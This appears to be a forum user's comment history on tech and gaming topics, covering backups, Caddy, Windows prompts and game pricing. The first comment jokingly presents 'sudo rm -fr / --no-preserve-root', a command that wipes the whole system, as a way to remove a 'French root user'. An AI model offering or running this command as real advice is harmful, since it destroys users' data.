Why are you deleting radiofrequecies from your device? Then the WiFi won’t work anymore!
But did you know that there’s a French root user hidden deeply within every Linux installation? To completely remove it, run the following command:
sudo rm -fr / —no-preserve-root

- Comment on Former Blizzard president wants to be able to leave a "tip" after completing $70 games: "I wish I could give these folks another $10 or $20" 7 months ago:
Your tip is “make another game and I’ll buy it because the last one was good”.
I bought your product and you want me to pay extra because it lived up to what it promised?
For an indie game that I bought cheap (maybe even on sale), I do sometimes feel that the price was way too low for the game and I’d appreciate a easy way support the dev/studio a bit further. For AAA $70+ titles? Nope, not gonna happen.
What’s up with this guy? Was he told “f u pay me” too often by his developers, that he took this phrase and found a new meaning for it?

- Comment on Windows 10 and its shortage of "Never shove this screen in my face again" buttons 7 months ago:
It gets better if you backup and then get the prompt again after the next feature update of windows - because you get asked again and if you click on it will do a second backup which means that now all files are twice in your OneDrive, then three times, then four times, then… a reminder to upgrade OneDrive further as your storage is full.
I had to clean up this less more than once now for people and even witnessed it live after doing the upgrade for them sigh

- Comment on There is one uncleared level remaining in Super Mario Maker, with 18 days to go before the servers shut down 8 months ago:
In theory there are unbeatable levels. With some updates Nintendo fixed glitches, hit boxes, etc. Usually, when you play a level that was uploaded on an older version of the game, you get the old behavior. But there was one update, which did not adhere to this, and which did cause some levels (designed with now fixed glitches) to be unbeatable now.
But this project isn’t about beating all levels, it’s about beating all uncleared levels. Since those glitch levels probably were beaten before the patch OR you might be able to play them on an older version of the game (if the server allows it), these shouldn’t be a huge problem.
- Comment on Should Caddy and Traefik Replace Certbot? 8 months ago:
My newest vps runs with Caddy. Works like a charm. The downside was, that I didn’t think of the automatic certificate deployment when I set everything up and it wouldn’t come up a first when I only wanted to connect locally to it, as it tried to get a certificate but the challenge failed because I hadn’t the firewall open yet. But besides that it was very smooth so far.
- Comment on Any service cheaper than Backblaze? 8 months ago:
Amazon Deep Glacier is a lot cheaper for storage (but expensive for retrieval).
I use Archive Storage in Oracle Cloud S3 for my dr backups which is their equivalent of AWS deep glacier archive. It’s quite cheap, no restore fees, inbound traffic is free and outbound traffic is only paid, when you’re using more than 10TB per month. (Also first 10 GB of S3 storage is free)

- Comment on This Guy Has Built an Open Source Search Engine as an Alternative to Google in His Spare Time 9 months ago:
I was wondering the same, but I didn’t find any information on how it builds the search index. I guess it takes quite a while until it’s usable. Also, it might be very dependent on the speed if the internet connection and also the available storage.

For me (on Firefox non-beta) it just opens the in-app browser and shoves ads down my throat. I just checked it, Chrome is disabled and cannot be uninstalled on my phone.
When I have a page opened in the Google News App, I can tap the menu and select to open the web page from there. Then it gets opened in Firefox.
- Comment on A perfect article reading experience 11 months ago:
You can’t. Even when Firefox with uBO is your default browser and any other app just uses Firefox as the built-in browser, Google News will resort to Chrome.
Workaroud: Open the website in Firefox instead of using the app - news.google.com

Of everyone pulled tightly, we’d come closer to form a perfect circle. I guess, that because of the tides, many would be under water then. Have it loose and give everyone something to stay afloat (life vest,…) sounds more promising.

Even then… I have a small USB stick that has a HDMI port and support HDCP. Which means it will capture any HDMI output unencrypted. It was like… 20 bucks on Ali Express. Since it counts as a valid HDCP sink, WEI can only attest that all components up to the “monitor” support copy protection. But it can’t see or attest, that I can just capture the data unencrypted anyways.
